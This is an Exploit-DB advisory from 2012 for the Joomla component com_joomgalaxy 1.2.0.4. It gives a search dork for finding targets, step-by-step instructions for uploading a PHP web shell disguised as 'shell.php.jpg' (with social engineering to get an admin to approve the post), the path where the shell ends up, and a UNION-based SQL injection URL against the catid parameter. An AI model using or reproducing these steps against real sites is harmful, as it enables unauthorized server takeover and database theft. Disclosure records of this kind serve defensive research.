Joomla! Component com_joomgalaxy 1.2.0.4 - Multiple Vulnerabilities

EDB-ID:

20197

CVE:



Author:

D4NB4R

Type:

webapps


Platform:

PHP

Date:

2012-08-02


_______________________________________________________________________________________
  
 Exploit Title: Joomla joomgalaxy 1.2.0.4 Multiple Vulnerabilites

 dork: inurl:com_joomgalaxy
 
 Date: [01-08-2012]
 
 Author: Daniel Barragan "D4NB4R"
 
 Twitter: @D4NB4R
 
 site: http://poisonsecurity.wordpress.com/
 
 Vendor: http://www.joomgalaxy.com/
 
 Version: 1.2.0.4 (last update on Jul 27, 2012)
 
 License: Commercial $ 149 us

 Demo: http://joomgalaxy.com/demo/
  
 Tested on: [Linux(bt5)-Windows(7ultimate)]


Joomgalaxy is a rich, comprehensive directory component brimming with unique features like Entry comparison, Pay per download, Tagging, Email Cloaking, Review and Rating with Multiple Attributes, add Articles to Entries, with many more plus all standard directory features as well. 

 
 
1. Unrestricted File Upload 

    

     1a. Go to this route, Complete the form and login the site
         Ingrese a esta ruta, Complete el formulario e ingrese al sitio 
    
                http://site/index.php?option=com_users&view=registration
 
 
     1b. go to the following link and create a new post (sometimes it ask for confirmation of an administrator)
         so then create the post with something of social engineering and wait for a confirmation, if not forget this step

         vaya a este enlace cree un nuevo anuncio "Algunas veces pide confirmacion de administrador"
         asi que cree el anuncio con algo de ingenieria social y espere que confirmen si no omita este paso 

               http://site/index.php?option=com_joomgalaxy&view=addentry
 
 
     1c.  once the post is published go to the tab images and upload your shell in the following way: shell.php.jpg
          Una vez resgistrado el anuncio dirijase a la pestaña imagenes y suba su shell de la siguiente forma 
          shell.php.jpg 
  
             
     1d.  Find your shell in the path 
          Busque su shell en este path 
 
           http://site/administrator/components/com_joomgalaxy/assets/images/Image_gallery/randomid_shell.php.jpg


2. Sql Injection

    
    p0c:   

           http://site/index.php?option=com_joomgalaxy&view=categorylist&type=thumbnail&lang=en&catid=100000001-100000001=0 union (select 1,database(),3,4,5,6,7,8,9,10,11,12,13)


     
    Gretz : devboot, P1l0tcast, ksha, dedalo, etc..  
  
 
Im not responsible for which is given
No me hago responsable del uso que se le de
_______________________________________________________________________________________
Daniel Barragan "D4NB4R"  2012